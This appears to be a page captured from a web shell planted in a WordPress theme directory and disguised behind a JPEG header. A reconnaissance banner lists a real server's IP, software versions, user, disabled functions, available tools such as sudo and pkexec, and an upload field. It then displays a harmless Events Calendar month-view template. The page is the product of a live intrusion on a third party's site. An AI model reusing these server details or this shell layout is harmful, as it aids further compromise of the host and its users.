????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.22.51.104 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/themes/Avada/tribe-events/month/ |
Upload File : |
<?php /** * Month View Single Day * This file contains one day in the month grid * * Override this template in your own theme by creating a file at [your-theme]/tribe-events/month/single-day.php * * @package TribeEventsCalendar * */ if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } $events_label_singular = tribe_get_event_label_singular(); $events_label_plural = tribe_get_event_label_plural(); $day = tribe_events_get_current_month_day(); ?> <!-- Day Header --> <div id="tribe-events-daynum-<?php echo $day['daynum'] ?>"> <?php if ( $day['total_events'] > 0 && tribe_events_is_view_enabled( 'day' ) ) : ?> <a href="<?php echo esc_url( tribe_get_day_link( $day['date'] ) ); ?>"><?php echo $day['daynum'] ?></a> <?php else : ?> <?php echo $day['daynum'] ?> <?php endif; ?> </div> <!-- Events List --> <?php while ( $day['events']->have_posts() ) : $day['events']->the_post(); ?> <?php tribe_get_template_part( 'month/single', 'event' ) ?> <?php endwhile; ?> <!-- View More --> <?php if ( $day['view_more'] ) : ?> <div class="tribe-events-viewmore"> <?php $view_all_label = sprintf( _n( 'View 1 %1$s', 'View All %2$s %3$s', $day['total_events'], 'the-events-calendar' ), $events_label_singular, $day['total_events'], $events_label_plural ); ?> <a href="<?php echo esc_url( $day['view_more'] ); ?>" class="fusion-read-more"><?php echo $view_all_label ?></a> </div> <?php endif;